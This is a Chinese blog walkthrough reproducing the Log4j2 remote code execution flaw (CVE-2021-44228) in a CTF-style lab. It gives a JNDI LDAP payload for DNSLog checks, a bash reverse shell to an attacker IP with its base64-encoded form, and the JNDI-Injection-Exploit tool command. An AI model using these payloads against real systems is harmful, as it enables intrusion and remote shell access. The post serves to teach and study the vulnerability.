Log4j2-RCE漏洞复现——CVE-2021-44228

1,打开实验环境
在这里插入图片描述

2,DNSLog验证
①点击 ???,用burpsuit 进行抓包
在这里插入图片描述

②通过DNSLog平台获取到域名eqpshf.dnslog.cn
在这里插入图片描述

③构造payload:${jndi:ldap:// eqpshf.dnslog.cn},并使用Burpsuite进行抓包并替换payload参数
在这里插入图片描述

④通过Burpsuite自带的编码工具对其进行URL编码:
在这里插入图片描述
在这里插入图片描述

⑤编码后发送请求包:
在这里插入图片描述

⑥在DNSLog网站成功接收到解析记录:
在这里插入图片描述

3,JNDI注入反弹shell
①在kali中下载JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用
在这里插入图片描述

②使用反弹shell指令,kali的ip为192.168.10.129,port可使用任意未被占用的端口,此处指定为4444,

bash -i >& /dev/tcp/192.168.10.129/4444 0>&1

③将此条命令进行Java Runtime Bash 编码:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

在这里插入图片描述

④编码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定kali的ip地址:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.10.129

在这里插入图片描述

⑤在新的窗口监听4444端口:
在这里插入图片描述

⑥替换工具生成的payload:rmi://192.168.10.129:1099/10a1qt 到Burpsuite:
在这里插入图片描述

⑦编码后发送到靶机:

在这里插入图片描述

⑧kali的监听窗口成功接收到反弹的shell:
在这里插入图片描述

⑨输入find / -name flag* ,成功得到flag

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值